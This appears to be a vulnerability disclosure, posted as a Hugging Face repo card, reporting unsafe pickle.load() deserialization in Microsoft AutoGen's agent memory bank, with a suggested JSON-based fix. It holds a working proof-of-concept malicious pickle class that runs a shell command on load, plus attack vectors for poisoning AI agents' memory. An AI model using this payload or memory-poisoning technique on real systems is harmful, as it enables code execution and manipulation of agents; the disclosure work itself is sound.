Hugging Face's logo

vellaveto
/
autogen-memory-pickle

Model card Files
xet
 Community

YAML Metadata Warning:empty or missing yaml metadata in repo card

Check out the documentation for more information.

Microsoft AutoGen β€” RCE via pickle.load() on Agent Memory Bank

Vulnerability Type

CWE-502: Deserialization of Untrusted Data

Severity

High β€” pickle.load() on agent memory files enables RCE when an agent initializes.

Affected Code

File: python/packages/autogen-ext/src/autogen_ext/experimental/task_centric_memory/_memory_bank.py Line: 82

if (not reset) and os.path.exists(self.path_to_dict):
    with open(self.path_to_dict, "rb") as f:
        self.uid_memo_dict = pickle.load(f)  # ← RCE if file is poisoned

Also: _string_similarity_map.py:48

with open(self.path_to_dict, "rb") as f:
    self.uid_text_dict = pickle.load(f)  # ← Same pattern

Steps to Reproduce

  1. Create an AutoGen agent with task-centric memory:
from autogen_ext.experimental.task_centric_memory import MemoryBank
bank = MemoryBank(path_to_dict="/tmp/autogen_memory.pkl")
bank.save()  # Creates the pickle file
  1. Replace the memory file with a malicious pickle:
import pickle, os

class AgentTakeover:
    def __reduce__(self):
        return (os.system, ('id > /tmp/autogen_pwned',))

with open("/tmp/autogen_memory.pkl", "wb") as f:
    pickle.dump({"malicious": AgentTakeover()}, f)
  1. Restart the agent β€” MemoryBank.__init__ calls pickle.load() β†’ RCE

Attack Vectors

  • Shared storage: Multi-agent setups where memory files are on shared volumes
  • Supply chain: Poisoned memory snapshots shared between teams
  • Agent-to-agent: One compromised agent writes malicious memory for another

AI Impact (10x Multiplier)

AutoGen is Microsoft's multi-agent framework. Compromising the memory bank enables:

  • Agent memory poisoning β€” inject false memories that influence decisions
  • Multi-agent chain compromise β€” one poisoned agent propagates to conversation partners
  • Persistent backdoor β€” memory survives agent restarts

Suggested Fix 

import json

if (not reset) and os.path.exists(self.path_to_dict):
    with open(self.path_to_dict, "r") as f:
        self.uid_memo_dict = json.load(f)  # Safe β€” no code execution

Invariant Violated

S16 (DeserializationGuard) + S14 (MemoryInputValidation)

Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. πŸ™‹ Ask for provider support